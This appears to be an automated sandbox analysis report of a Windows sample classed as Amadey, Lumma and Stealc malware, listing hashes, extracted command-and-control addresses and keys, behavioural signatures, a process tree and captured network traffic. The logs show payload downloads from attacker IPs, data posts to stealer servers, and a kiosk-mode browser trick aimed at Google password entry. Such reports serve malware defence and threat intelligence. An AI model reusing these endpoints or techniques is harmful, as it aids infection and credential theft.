Analysis

  • max time kernel
    144s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    07-12-2024 02:44

General

  • Target

    553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe

  • Size

    1.8MB

  • MD5

    a93b02d857db3b12c32bd765b83825ab

  • SHA1

    137f12047a081e6581e1d1a83c939d98514c3ff3

  • SHA256

    553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa

  • SHA512

    aab2bfd4090c77b87784d0110f5ee2dd24554fada9bdf9c2e8e08ff01a9025f5d8a7dfa2d4b89bf35cb037c162292a04f1084b87727b1bd201a9b5ab1b367bcd

  • SSDEEP

    49152:3jRwzOUOxqpHXV7ehRYo/cpkFt80BZ2QV7aGyC:3j+pOkJXV7Nqckm

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain
1
006700e5a2ab05704bbb0c589b88924d

Extracted

Family

lumma

C2

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

https://atten-supporse.biz/api

Extracted

Family

stealc

Botnet

drum

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://atten-supporse.biz/api

https://se-blurry.biz/api

https://zinc-sneark.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 5 IoCs
  • Identifies Wine through registry keys 2 TTPs 5 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 8 IoCs
  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 15 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe
    "C:\Users\Admin\AppData\Local\Temp\553620b236b58004ed19556a8e380ea9c17f542d16986f0c88e9e7efc64670fa.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1660
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2640
      • C:\Users\Admin\AppData\Local\Temp\1012851001\d1eb0cd776.exe
        "C:\Users\Admin\AppData\Local\Temp\1012851001\d1eb0cd776.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:852
      • C:\Users\Admin\AppData\Local\Temp\1012852001\165fa3ed5f.exe
        "C:\Users\Admin\AppData\Local\Temp\1012852001\165fa3ed5f.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2980
      • C:\Users\Admin\AppData\Local\Temp\1012853001\a3af4d3bce.exe
        "C:\Users\Admin\AppData\Local\Temp\1012853001\a3af4d3bce.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1744
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM firefox.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2000
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM chrome.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:532
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM msedge.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2140
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM opera.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:764
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM brave.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1484
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2100
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
            5⤵
            • Checks processor information in registry
            • Modifies registry class
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:2128
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.0.1430177469\1492140918" -parentBuildID 20221007134813 -prefsHandle 1204 -prefMapHandle 1196 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {40084d1b-1917-43f4-9288-b39eae22dad7} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 1308 fed6158 gpu
              6⤵
                PID:2564
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.1.1813241620\1207456748" -parentBuildID 20221007134813 -prefsHandle 1484 -prefMapHandle 1480 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5acca9fb-cd7c-4d13-9e86-2a6e622e4aea} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 1496 edeb258 socket
                6⤵
                  PID:2440
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.2.803376644\835238809" -childID 1 -isForBrowser -prefsHandle 2060 -prefMapHandle 2056 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {458d177d-038d-494e-887c-a9f6c44aba4a} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 2072 184c7058 tab
                  6⤵
                    PID:1036
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.3.530846057\1271207579" -childID 2 -isForBrowser -prefsHandle 2808 -prefMapHandle 2804 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd75f913-9ac5-4a1e-9cf1-402da143d74a} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 2820 1bf08558 tab
                    6⤵
                      PID:2300
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.4.265144092\861899394" -childID 3 -isForBrowser -prefsHandle 3632 -prefMapHandle 3652 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e8924fde-2a19-485e-8580-b0fbf2b4397f} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 3504 1eb46258 tab
                      6⤵
                        PID:1680
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.5.1000239758\466541562" -childID 4 -isForBrowser -prefsHandle 3800 -prefMapHandle 3804 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fe3deabe-3fa1-4efe-9119-4a14e5ea18fb} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 3788 1f3ed358 tab
                        6⤵
                          PID:2704
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2128.6.1653761712\1610857076" -childID 5 -isForBrowser -prefsHandle 3876 -prefMapHandle 3660 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 596 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4f22db11-68f9-48b2-b7e8-b2cdd15c9d5e} 2128 "\\.\pipe\gecko-crash-server-pipe.2128" 3916 1f3ee858 tab
                          6⤵
                            PID:2576
                    • C:\Users\Admin\AppData\Local\Temp\1012854001\27c0ef76e8.exe
                      "C:\Users\Admin\AppData\Local\Temp\1012854001\27c0ef76e8.exe"
                      3⤵
                      • Modifies Windows Defender Real-time Protection settings
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Windows security modification
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3016

                Network

                • flag-ru
                  POST
                  http://185.215.113.43/Zu7JuNko/index.php
                  skotes.exe
                  Remote address:
                  185.215.113.43:80
                  Request
                  POST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Response
                  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 07 Dec 2024 02:44:52 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                • flag-ru
                  POST
                  http://185.215.113.43/Zu7JuNko/index.php
                  skotes.exe
                  Remote address:
                  185.215.113.43:80
                  Request
                  POST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 156
                  Cache-Control: no-cache
                  Response
                  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 07 Dec 2024 02:44:54 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                • flag-ru
                  POST
                  http://185.215.113.43/Zu7JuNko/index.php
                  skotes.exe
                  Remote address:
                  185.215.113.43:80
                  Request
                  POST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 31
                  Cache-Control: no-cache
                  Response
                  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 07 Dec 2024 02:44:57 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                • flag-ru
                  POST
                  http://185.215.113.43/Zu7JuNko/index.php
                  skotes.exe
                  Remote address:
                  185.215.113.43:80
                  Request
                  POST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 31
                  Cache-Control: no-cache
                  Response
                  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 07 Dec 2024 02:45:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                • flag-ru
                  POST
                  http://185.215.113.43/Zu7JuNko/index.php
                  skotes.exe
                  Remote address:
                  185.215.113.43:80
                  Request
                  POST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 31
                  Cache-Control: no-cache
                  Response
                  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 07 Dec 2024 02:45:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                • flag-ru
                  POST
                  http://185.215.113.43/Zu7JuNko/index.php
                  skotes.exe
                  Remote address:
                  185.215.113.43:80
                  Request
                  POST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 31
                  Cache-Control: no-cache
                  Response
                  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 07 Dec 2024 02:45:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                • flag-ru
                  GET
                  http://185.215.113.16/luma/random.exe
                  skotes.exe
                  Remote address:
                  185.215.113.16:80
                  Request
                  GET /luma/random.exe HTTP/1.1
                  Host: 185.215.113.16
                  Response
                  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 07 Dec 2024 02:44:54 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 1830400
                  Last-Modified: Sat, 07 Dec 2024 02:16:12 GMT
                  Connection: keep-alive
                  ETag: "6753afec-1bee00"
                  Accept-Ranges: bytes
                • flag-ru
                  GET
                  http://185.215.113.16/steam/random.exe
                  skotes.exe
                  Remote address:
                  185.215.113.16:80
                  Request
                  GET /steam/random.exe HTTP/1.1
                  Host: 185.215.113.16
                  Response
                  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 07 Dec 2024 02:44:57 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 5173248
                  Last-Modified: Sat, 07 Dec 2024 02:16:21 GMT
                  Connection: keep-alive
                  ETag: "6753aff5-4ef000"
                  Accept-Ranges: bytes
                • flag-ru
                  GET
                  http://185.215.113.16/well/random.exe
                  skotes.exe
                  Remote address:
                  185.215.113.16:80
                  Request
                  GET /well/random.exe HTTP/1.1
                  Host: 185.215.113.16
                  Response
                  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 07 Dec 2024 02:45:06 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 971264
                  Last-Modified: Sat, 07 Dec 2024 02:14:24 GMT
                  Connection: keep-alive
                  ETag: "6753af80-ed200"
                  Accept-Ranges: bytes
                • flag-ru
                  GET
                  http://185.215.113.16/off/random.exe
                  skotes.exe
                  Remote address:
                  185.215.113.16:80
                  Request
                  GET /off/random.exe HTTP/1.1
                  Host: 185.215.113.16
                  Response
                  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 07 Dec 2024 02:45:10 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 2766336
                  Last-Modified: Sat, 07 Dec 2024 02:14:50 GMT
                  Connection: keep-alive
                  ETag: "6753af9a-2a3600"
                  Accept-Ranges: bytes
                • flag-us
                  DNS
                  atten-supporse.biz
                  d1eb0cd776.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  atten-supporse.biz
                  IN A
                  Response
                  atten-supporse.biz
                  IN A
                  104.21.16.9
                  atten-supporse.biz
                  IN A
                  172.67.165.166
                • flag-us
                  POST
                  https://atten-supporse.biz/api
                  d1eb0cd776.exe
                  Remote address:
                  104.21.16.9:443
                  Request
                  POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 8
                  Host: atten-supporse.biz
                  Response
                  HTTP/1.1 200 OK
                  Date: Sat, 07 Dec 2024 02:44:57 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Set-Cookie: PHPSESSID=818nekq9tromapg55ognkmvp1m; expires=Tue, 01-Apr-2025 20:31:36 GMT; Max-Age=9999999; path=/
                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                  Cache-Control: no-store, no-cache, must-revalidate
                  Pragma: no-cache
                  cf-cache-status: DYNAMIC
                  vary: accept-encoding
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GmB2wHyeXmsnZ1romxLQMt4Wz1ymSdqVhPFQY6GVX7RWC3EbZ7c1al2bJbD4ZA9UFS5r9GduDWoYTrMwSbKT3Of3re284aNonUxDazIFTFTmOoI5WCEvC1sYin45kFaGUVFxaKk%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8ee12d416cb6cd22-LHR
                  alt-svc: h3=":443"; ma=86400
                  server-timing: cfL4;desc="?proto=TCP&rtt=32189&min_rtt=26250&rtt_var=17042&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2863&recv_bytes=586&delivery_rate=130669&cwnd=242&unsent_bytes=0&cid=02f989390392c673&ts=325&x=0"
                • flag-us
                  DNS
                  se-blurry.biz
                  d1eb0cd776.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  se-blurry.biz
                  IN A
                  Response
                  se-blurry.biz
                  IN A
                  172.67.162.65
                  se-blurry.biz
                  IN A
                  104.21.81.153
                • flag-us
                  POST
                  https://se-blurry.biz/api
                  d1eb0cd776.exe
                  Remote address:
                  172.67.162.65:443
                  Request
                  POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 8
                  Host: se-blurry.biz
                  Response
                  HTTP/1.1 200 OK
                  Date: Sat, 07 Dec 2024 02:44:57 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Set-Cookie: PHPSESSID=kmltkhneqv2e17ahnjbfre8p2m; expires=Tue, 01-Apr-2025 20:31:36 GMT; Max-Age=9999999; path=/
                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                  Cache-Control: no-store, no-cache, must-revalidate
                  Pragma: no-cache
                  cf-cache-status: DYNAMIC
                  vary: accept-encoding
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eBRdLQqQSDJAlPFPKFclw3XL6KXS7A9OIzLWatZzMef5woeqzFgPcANHIOmRDL3nj8ClcsnCmaTDYbeSHB6yi7C6Z3RQSvQtpSRqg%2BAKEM8iApHttcPskEAP%2BG5sRhBI"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8ee12d43caad48b9-LHR
                  alt-svc: h3=":443"; ma=86400
                  server-timing: cfL4;desc="?proto=TCP&rtt=27330&min_rtt=25758&rtt_var=8277&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=581&delivery_rate=134431&cwnd=253&unsent_bytes=0&cid=d323d40f3982bf5f&ts=231&x=0"
                • flag-us
                  DNS
                  zinc-sneark.biz
                  d1eb0cd776.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  zinc-sneark.biz
                  IN A
                  Response
                  zinc-sneark.biz
                  IN A
                  172.67.136.167
                  zinc-sneark.biz
                  IN A
                  104.21.62.142
                • flag-us
                  POST
                  https://zinc-sneark.biz/api
                  d1eb0cd776.exe
                  Remote address:
                  172.67.136.167:443
                  Request
                  POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 8
                  Host: zinc-sneark.biz
                  Response
                  HTTP/1.1 403 Forbidden
                  Date: Sat, 07 Dec 2024 02:44:57 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  X-Frame-Options: SAMEORIGIN
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=inEuN20ha1ELB9jct%2BaMlWIAz6QkGeJZTP5pUrTefpGVnq91IJh%2BPoKR2O%2BJlE9OjGowL4rcYXpozbX1j70WUHrWv8rC%2BaX%2FTRgHN4ARpo2DQI3a6HS%2FjCAjsvCcgvJd4vo%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8ee12d464d40ed0b-LHR
                • flag-us
                  POST
                  https://zinc-sneark.biz/api
                  d1eb0cd776.exe
                  Remote address:
                  172.67.136.167:443
                  Request
                  POST /api HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Cookie: __cf_mw_byp=qNIp90r.SHEYd_qmd_KFOgLmKOCHrYk2Bq1ZNwN6MgY-1733539497-0.0.1.1-/api
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                  Content-Length: 53
                  Host: zinc-sneark.biz
                  Response
                  HTTP/1.1 200 OK
                  Date: Sat, 07 Dec 2024 02:44:58 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Set-Cookie: PHPSESSID=fomo9eenelmm8fnrnbp8g375qt; expires=Tue, 01-Apr-2025 20:31:37 GMT; Max-Age=9999999; path=/
                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                  Cache-Control: no-store, no-cache, must-revalidate
                  Pragma: no-cache
                  cf-cache-status: DYNAMIC
                  vary: accept-encoding
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cVG8hh10C4NXOm3Jk4bH3E%2BPfc9eUtCkZRWkb8QIwv1H%2Bnsq8ztyqs1NbYBIiUirGXwmfmOHjG8uzrP3AFH3Z%2FLyk6WxmhI%2BQRpNRQUKYfWdLdwZZSfXo1beOdGRG7kPYu0%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8ee12d48b8d0ed0b-LHR
                  alt-svc: h3=":443"; ma=86400
                  server-timing: cfL4;desc="?proto=TCP&rtt=33308&min_rtt=28239&rtt_var=7219&sent=13&recv=12&lost=0&retrans=0&sent_bytes=8127&recv_bytes=1057&delivery_rate=286538&cwnd=257&unsent_bytes=0&cid=786a4ddf764d5cb4&ts=656&x=0"
                • flag-ru
                  GET
                  http://185.215.113.206/
                  165fa3ed5f.exe
                  Remote address:
                  185.215.113.206:80
                  Request
                  GET / HTTP/1.1
                  Host: 185.215.113.206
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Response
                  HTTP/1.1 200 OK
                  Date: Sat, 07 Dec 2024 02:45:07 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 0
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                • flag-ru
                  POST
                  http://185.215.113.206/c4becf79229cb002.php
                  165fa3ed5f.exe
                  Remote address:
                  185.215.113.206:80
                  Request
                  POST /c4becf79229cb002.php HTTP/1.1
                  Content-Type: multipart/form-data; boundary=----BGHCGCAEBFIJKFIDBGHD
                  Host: 185.215.113.206
                  Content-Length: 211
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Response
                  HTTP/1.1 200 OK
                  Date: Sat, 07 Dec 2024 02:45:07 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 8
                  Keep-Alive: timeout=5, max=99
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                • flag-us
                  DNS
                  youtube.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  youtube.com
                  IN A
                  Response
                  youtube.com
                  IN A
                  216.58.213.14
                • flag-us
                  DNS
                  spocs.getpocket.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  spocs.getpocket.com
                  IN A
                  Response
                  spocs.getpocket.com
                  IN CNAME
                  prod.ads.prod.webservices.mozgcp.net
                  prod.ads.prod.webservices.mozgcp.net
                  IN A
                  34.117.188.166
                • flag-us
                  DNS
                  getpocket.cdn.mozilla.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  getpocket.cdn.mozilla.net
                  IN A
                  Response
                  getpocket.cdn.mozilla.net
                  IN CNAME
                  getpocket-cdn.prod.mozaws.net
                  getpocket-cdn.prod.mozaws.net
                  IN CNAME
                  prod.pocket.prod.cloudops.mozgcp.net
                  prod.pocket.prod.cloudops.mozgcp.net
                  IN A
                  34.120.5.221
                • flag-gb
                  GET
                  https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                  firefox.exe
                  Remote address:
                  216.58.213.14:443
                  Request
                  GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/2.0
                  host: youtube.com
                  user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                  accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  accept-language: en-US,en;q=0.5
                  accept-encoding: gzip, deflate, br
                  upgrade-insecure-requests: 1
                  sec-fetch-dest: document
                  sec-fetch-mode: navigate
                  sec-fetch-site: none
                  sec-fetch-user: ?1
                  te: trailers
                • flag-us
                  DNS
                  youtube.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  youtube.com
                  IN A
                  Response
                  youtube.com
                  IN A
                  216.58.213.14
                • flag-us
                  GET
                  https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                  firefox.exe
                  Remote address:
                  34.120.5.221:443
                  Request
                  GET /v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30 HTTP/2.0
                  host: getpocket.cdn.mozilla.net
                  user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                  accept: */*
                  accept-language: en-US,en;q=0.5
                  accept-encoding: gzip, deflate, br
                  sec-fetch-dest: empty
                  sec-fetch-mode: cors
                  sec-fetch-site: cross-site
